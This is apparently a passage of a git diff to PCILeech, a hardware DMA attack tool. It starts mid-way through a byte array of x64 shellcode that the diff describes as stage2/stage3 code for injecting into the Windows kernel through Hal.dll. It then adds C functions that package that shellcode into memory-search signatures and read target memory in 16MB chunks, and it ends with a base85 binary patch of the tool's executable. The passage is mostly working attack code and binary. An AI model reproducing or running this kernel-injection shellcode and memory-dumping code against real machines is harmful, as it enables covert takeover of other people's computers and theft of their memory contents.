+	0xff, 0xff, 0x48, 0x49, 0x89, 0x85, 0x00, 0x10, 0x00, 0x00, 0x48, 0xb8,
+	0x8b, 0x00, 0x48, 0x83, 0xf8, 0x00, 0x74, 0xf0, 0x49, 0x89, 0x85, 0x08,
+	0x10, 0x00, 0x00, 0xc6, 0x05, 0x21, 0xff, 0xff, 0xff, 0x0b, 0x6a, 0x00,
+	0x41, 0x55, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x49, 0x03, 0xc5, 0x50, 0x6a,
+	0x00, 0x48, 0x83, 0xec, 0x20, 0x49, 0x8b, 0xcc, 0xba, 0x02, 0x6b, 0xa0,
+	0x94, 0xe8, 0xaa, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xcd, 0x48, 0xc7, 0xc2,
+	0xff, 0xff, 0x1f, 0x00, 0x4d, 0x33, 0xc0, 0x4d, 0x33, 0xc9, 0xff, 0xd0,
+	0x48, 0x83, 0xc4, 0x40, 0xc6, 0x05, 0xe4, 0xfe, 0xff, 0xff, 0x09, 0x49,
+	0x8b, 0xcc, 0xba, 0x57, 0x63, 0x32, 0x5a, 0xe8, 0x80, 0x00, 0x00, 0x00,
+	0x49, 0x8b, 0xcd, 0xff, 0xd0, 0x89, 0x05, 0xcd, 0xfe, 0xff, 0xff, 0xc6,
+	0x05, 0xc5, 0xfe, 0xff, 0xff, 0x08, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5d,
+	0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x5f, 0x5e, 0x5b, 0x41, 0x59, 0x41,
+	0x58, 0x5a, 0x59, 0x48, 0x8b, 0x05, 0xae, 0xfe, 0xff, 0xff, 0xff, 0xe0,
+	0x56, 0x57, 0x48, 0x8b, 0xf1, 0x48, 0x33, 0xff, 0x48, 0x33, 0xc0, 0xfc,
+	0xac, 0x84, 0xc0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xeb, 0xf4,
+	0x8b, 0xc7, 0x5f, 0x5e, 0xc3, 0x48, 0xc1, 0xe9, 0x0c, 0x48, 0xc1, 0xe1,
+	0x0c, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x48, 0x2b, 0xc8, 0x66, 0x8b, 0x01,
+	0x66, 0x3d, 0x4d, 0x5a, 0x75, 0xef, 0x8b, 0x41, 0x3c, 0x3d, 0x00, 0x10,
+	0x00, 0x00, 0x77, 0xe5, 0x48, 0x03, 0xc1, 0x8b, 0x00, 0x3d, 0x50, 0x45,
+	0x00, 0x00, 0x75, 0xd9, 0x48, 0x8b, 0xc1, 0xc3, 0x57, 0x56, 0x8b, 0x79,
+	0x3c, 0x8b, 0xbc, 0x39, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xf9, 0x44,
+	0x8b, 0x47, 0x18, 0x48, 0x33, 0xf6, 0x8b, 0x47, 0x20, 0x48, 0x03, 0xc1,
+	0x8b, 0x04, 0xb0, 0x48, 0x03, 0xc1, 0x51, 0x48, 0x8b, 0xc8, 0xe8, 0x85,
+	0xff, 0xff, 0xff, 0x59, 0x3b, 0xc2, 0x74, 0x05, 0x48, 0xff, 0xc6, 0xeb,
+	0xe1, 0x8b, 0x57, 0x24, 0x48, 0x03, 0xd1, 0x48, 0x33, 0xc0, 0x66, 0x8b,
+	0x04, 0x72, 0x8b, 0x57, 0x1c, 0x48, 0x03, 0xd1, 0x8b, 0x04, 0x82, 0x48,
+	0x03, 0xc1, 0x5e, 0x5f, 0xc3
+};
+
 const BYTE LINUX_X64_STAGE1_BIN[] = {
 	0xe8, 0xfb, 0xff, 0xff, 0xff
 };
diff --git a/pcileech/util.c b/pcileech/util.c
index e72b0a0..1dbe262 100644
--- a/pcileech/util.c
+++ b/pcileech/util.c
@@ -239,7 +239,15 @@ BOOL Util_ParseSignatureLine(_In_ PSTR szLine, _In_ DWORD cSignatureChunks, _Out
 		szLine = NULL;
 		if(!szToken) { return FALSE; }
 		if(i % 2 == 0) {
-			pChunk->cbOffset = strtoul(szToken, NULL, 16);
+			if(szToken[0] == '*') {
+				pChunk->tpOffset = SIGNATURE_CHUNK_TP_OFFSET_ANY;
+			} else {
+				if(szToken[0] == 'r') {
+					pChunk->tpOffset = SIGNATURE_CHUNK_TP_OFFSET_RELATIVE;
+					szToken = &szToken[1];
+				}
+				pChunk->cbOffset = strtoul(szToken, NULL, 16);
+			}
 		} else {
 			result = Util_ParseHexFileBuiltin(szToken, pChunk->pb, sizeof(pChunk->pb), &pChunk->cb);
 			if(!result) { return FALSE; }
@@ -397,3 +405,77 @@ VOID Util_CreateSignatureAppleGeneric(_In_ DWORD paKernelBase, _In_ DWORD paFunc
 	pSignature->chunk[0].qwAddress = pSignature->chunk[0].cbOffset & ~0xfff;
 	pSignature->chunk[1].qwAddress = pSignature->chunk[1].cbOffset & ~0xfff;
 }
+
+VOID Util_CreateSignatureWindowsHalGeneric(_Out_ PSIGNATURE pSignature)
+{
+	memset(pSignature, 0, sizeof(SIGNATURE));
+	memcpy(pSignature->chunk[3].pb, WINX64_STAGE2_HAL_BIN, sizeof(WINX64_STAGE2_HAL_BIN));
+	memcpy(pSignature->chunk[4].pb, WINX64_STAGE3_BIN, sizeof(WINX64_STAGE3_BIN));
+	pSignature->chunk[3].cb = sizeof(WINX64_STAGE2_HAL_BIN);
+	pSignature->chunk[4].cb = sizeof(WINX64_STAGE3_BIN);
+}
+
+VOID Util_CreateSignatureSearchAll(_In_ PBYTE pb, _In_ DWORD cb, _Out_ PSIGNATURE pSignature)
+{
+	memset(pSignature, 0, sizeof(SIGNATURE));
+	pSignature->chunk[0].tpOffset = SIGNATURE_CHUNK_TP_OFFSET_ANY;
+	pSignature->chunk[0].cb = cb < 0x1000 ? cb : 0x1000;
+	memcpy(pSignature->chunk[0].pb, pb, pSignature->chunk[0].cb);
+}
+
+VOID Util_Read1M(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData, _Out_ PBYTE pbBuffer1M, _In_ QWORD qwBaseAddress, _Inout_ PPAGE_STATISTICS pPageStat)
+{
+	QWORD o, p;
+	// try read 1M in 128k chunks
+	for(o = 0; o < 0x00100000; o += 0x00020000) {
+		if((qwBaseAddress + o + 0x00020000 <= pCfg->qwAddrMax) && DeviceReadMEM(pDeviceData, qwBaseAddress + o, pbBuffer1M + o, 0x00020000)) {
+			pPageStat->cPageSuccess += 32;
+		} else {
+			// try read 128k in 4k (page) chunks
+			for(p = 0; p < 0x00020000; p += 0x1000) {
+				if(!(qwBaseAddress + o + p + 0x1000 <= pCfg->qwAddrMax)) {
+					return;
+				}
+				if(DeviceReadMEM(pDeviceData, qwBaseAddress + o + p, pbBuffer1M + o + p, 0x1000)) {
+					pPageStat->cPageSuccess++;
+				} else {
+					pPageStat->cPageFail++;
+				}
+			}
+		}
+	}
+}
+
+BOOL Util_Read16M(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData, _Out_ PBYTE pbBuffer16M, _In_ QWORD qwBaseAddress, _Inout_ PPAGE_STATISTICS pPageStat)
+{
+	BOOL isSuccess[4] = { FALSE, FALSE, FALSE, FALSE };
+	QWORD i, o, qwOffset;
+	// try read 16M
+	if((qwBaseAddress + 0x01000000 <= pCfg->qwAddrMax) && DeviceReadMEM(pDeviceData, qwBaseAddress, pbBuffer16M, 0x01000000)) {
+		pPageStat->cPageSuccess += 4096;
+		return TRUE;
+	}
+	// try read 16M in 4M chunks
+	memset(pbBuffer16M, 0, 0x01000000);
+	for(i = 0; i < 4; i++) {
+		o = 0x00400000 * i;
+		isSuccess[i] = (qwBaseAddress + o + 0x00400000 <= pCfg->qwAddrMax) && DeviceReadMEM(pDeviceData, qwBaseAddress + o, pbBuffer16M + o, 0x00400000);
+	}
+	// DMA mode + all memory inside scope + and all 4M reads fail => fail
+	if(!pDeviceData->KMDHandle && qwBaseAddress + 0x01000000 <= pCfg->qwAddrMax && !isSuccess[0] && !isSuccess[1] && !isSuccess[2] && !isSuccess[3]) {
+		pPageStat->cPageFail += 4096;
+		return FALSE;
+	}
+	// try read failed 4M chunks in 1M chunks
+	for(i = 0; i < 4; i++) {
+		if(isSuccess[i]) {
+			pPageStat->cPageSuccess += 1024;
+		} else {
+			qwOffset = 0x00400000 * i;
+			for(o = 0; o < 0x00400000; o += 0x00100000) {
+				Util_Read1M(pCfg, pDeviceData, pbBuffer16M + qwOffset + o, qwBaseAddress + qwOffset + o, pPageStat);
+			}
+		}
+	}
+	return TRUE;
+}
\ No newline at end of file
diff --git a/pcileech/util.h b/pcileech/util.h
index 062d23b..5cfc892 100644
--- a/pcileech/util.h
+++ b/pcileech/util.h
@@ -47,8 +47,8 @@ BOOL Util_LoadSignatures(_In_ LPSTR szSignatureName, _In_ LPSTR szFileExtension,
 /*
 * Retrieve the full file path to the file name specified. Path is relative to
 * directory of running executable.
-* szPath = buffer to receive the full path result.
-* szFileName = a file name in the current directory.
+* -- szPath = buffer to receive the full path result.
+* -- szFileName = a file name in the current directory.
 */
 VOID Util_GetFileInDirectory(_Out_ CHAR szPath[MAX_PATH], _In_ LPSTR szFileName);
 
@@ -68,8 +68,8 @@ DWORD Util_memcmpEx(_In_ PBYTE pb1, _In_ PBYTE pb2, _In_ DWORD cb);
 
 /*
 * Simple random number function.
-* --pb = buffer to receive random data.
-* --cb = length of random data to create.
+* -- pb = buffer to receive random data.
+* -- cb = length of random data to create.
 */
 VOID Util_GenRandom(_Out_ PBYTE pb, _In_ DWORD cb);
 
@@ -121,4 +121,33 @@ VOID Util_CreateSignatureLinuxGeneric(_In_ DWORD paBase, _In_ DWORD paSzKallsyms
 */
 VOID Util_CreateSignatureAppleGeneric(_In_ DWORD paKernelBase, _In_ DWORD paFunctionHook, _In_ DWORD paStage2, _Out_ PSIGNATURE pSignature);
 
+
+/*
+* Load the stage2 and stage3 code for the Hal.dll injection technique into
+* the supplied signature.
+* -- pSignature = ptr to signature struct to place the result in.
+*/
+VOID Util_CreateSignatureWindowsHalGeneric(_Out_ PSIGNATURE pSignature);
+
+/*
+* Create a search signature that searches all memory for the signature given in
+* the supplied pb and cb parameters.
+* -- pb = signature.
+* -- cb
+* -- pSignature = ptr to signature struct to place the result in.
+*/
+VOID Util_CreateSignatureSearchAll(_In_ PBYTE pb, _In_ DWORD cb, _Out_ PSIGNATURE pSignature);
+
+/*
+* Read a 16MB data chunk from the target and place it in the pbBuffer16M buffer.
+* Any data that failed to read within the 16MB buffer is set to zero.
+* -- pCfg
+* -- pDeviceData
+* -- pbBuffer16M = the already allocated 16MB buffer to place the content in.
+* -- qwBaseAddress = the base address to start reading from.
+* -- pPageStat = statistics struct to update on progress (pages success/fail).
+* -- return = TRUE if at least one 4k page could be read; FALSE if all pages failed.
+*/
+BOOL Util_Read16M(_In_ PCONFIG pCfg, _In_ PDEVICE_DATA pDeviceData, _Out_ PBYTE pbBuffer16M, _In_ QWORD qwBaseAddress, _Inout_ PPAGE_STATISTICS pPageStat);
+
 #endif /* __UTIL_H__ */
\ No newline at end of file
diff --git a/pcileech_files/pcileech.exe b/pcileech_files/pcileech.exe
index 395362c3542e4cdc5f62c13e17db3d016de0da9e..0a13221a03fc392f6091bf0263a2492653eb5b06 100644
GIT binary patch
delta 61971
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
